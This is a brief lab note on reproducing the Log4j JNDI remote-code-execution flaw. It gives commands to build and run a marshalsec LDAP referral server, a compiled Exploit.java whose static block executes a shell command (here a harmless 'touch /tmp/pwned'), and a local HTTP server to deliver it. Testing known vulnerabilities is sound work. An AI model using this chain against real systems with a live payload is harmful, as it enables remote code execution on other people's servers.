Log4J Shenanigans
First POC was found here, https://github.com/tangxiaofeng7/apache-log4j-poc.git, no longer exists thanks github!
I tested this with java version:
openjdk version "1.8.0_312"
OpenJDK Runtime Environment (build 1.8.0_312-8u312-b07-0ubuntu1~20.04-b07)
OpenJDK 64-Bit Server VM (build 25.312-b07, mixed mode)
Once in the environment, ensure the MarshalSec has copied over if not, download it
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests
run it in screen probably
screen java -cp ./target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://localhost:8888/#Exploit"
create exploit, compile it
javac Exploit.java
// Exploit.java
class Exploit {
static {
try { Runtime.getRuntime().exec("touch /tmp/pwned"); } catch(Exception e) {}
}
}
run your webserver
screen python -m SimpleHTTPServer 8888`